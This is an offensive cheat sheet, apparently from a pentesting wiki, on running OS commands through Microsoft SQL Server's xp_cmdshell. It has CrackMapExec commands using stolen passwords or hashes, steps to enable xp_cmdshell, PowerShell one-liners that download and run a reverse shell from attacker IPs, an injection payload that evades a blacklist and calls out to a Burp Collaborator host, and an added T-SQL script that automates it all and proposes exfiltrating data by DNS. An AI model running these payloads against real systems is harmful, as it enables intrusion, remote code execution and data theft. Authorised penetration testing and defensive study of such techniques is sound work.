Note that in order to execute commands it is not only necessary to have xp_cmdshell enabled, but also to hold the EXECUTE permission on the xp_cmdshell stored procedure. You can list who has been explicitly granted it (sysadmins will not appear, since they bypass permission checks) with:
USE master
EXEC sp_helprotect 'xp_cmdshell'
Check if current user is sysadmin
SELECT is_srvrolemember('sysadmin');
a' UNION all SELECT null,2; EXEC .....
# mssql account
# Username + Password + CMD command
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'

# Check if xp_cmdshell is enabled (value_in_use = 1 means it is active)
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# This turns on advanced options and is needed to configure xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
# This enables xp_cmdshell
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE

# One liner (every sp_configure after the first statement in a batch needs an explicit EXEC)
EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'

# Get Rev shell
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://192.168.119.129:8000/rev.ps1") | powershell -noprofile'
or
EXEC xp_cmdshell 'powershell -c IEX(New-Object Net.WebClient).DownloadString(''http://192.168.119.173/rev.ps1'')'
-- if the bare name fails, try master..xp_cmdshell

# Bypass blacklisted "EXEC xp_cmdshell" by calling the procedure through a variable
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' --
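The following T-SQL batch is an added example, not code from the original page: it ties the checks above together (sysadmin membership, EXECUTE permission on the procedure via HAS_PERMS_BY_NAME, current state in sys.configurations), enables xp_cmdshell only when it is off, and then runs the command through a variable name while capturing its output into a table with INSERT ... EXEC, so the result survives even when the client or injection point discards result sets. It assumes an interactive session or a stacked-query injection point against master; the command `whoami` is a placeholder.

```sql
-- Added example (not from the original page). Assumes a session on master.
USE master;

-- 1. Who am I, and do I bypass permission checks entirely (sysadmin)?
SELECT SYSTEM_USER                 AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 2. Do I hold EXECUTE on the procedure itself? sysadmins return 1 regardless,
--    everyone else needs an explicit grant (what sp_helprotect lists).
SELECT HAS_PERMS_BY_NAME('master.dbo.xp_cmdshell', 'OBJECT', 'EXECUTE') AS can_exec_xp_cmdshell;

-- 3. Is the feature switched on? value = configured, value_in_use = currently active
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 4. Enable it only if needed (sp_configure requires ALTER SETTINGS, held by sysadmin/serveradmin)
IF NOT EXISTS (SELECT 1 FROM sys.configurations
               WHERE name = 'xp_cmdshell' AND value_in_use = 1)
BEGIN
    EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1;          RECONFIGURE;
END;

-- 5. Run the command and keep its output instead of relying on the result set
DECLARE @cmd  NVARCHAR(4000) = N'whoami';        -- placeholder command (assumption)
DECLARE @proc VARCHAR(100)   = 'xp_cmdshell';    -- indirect name, as in the blacklist bypass above
DECLARE @out  TABLE (line NVARCHAR(4000));

INSERT INTO @out (line)
EXEC @proc @cmd;                                  -- equivalent to EXEC master..xp_cmdshell 'whoami'

-- xp_cmdshell appends a trailing NULL row; drop it
SELECT line FROM @out WHERE line IS NOT NULL;
```

In a blind injection the captured rows in @out can be read back one at a time with a boolean or time-based condition, or concatenated into a single string and sent out with a DNS lookup like the burpcollaborator ping shown above.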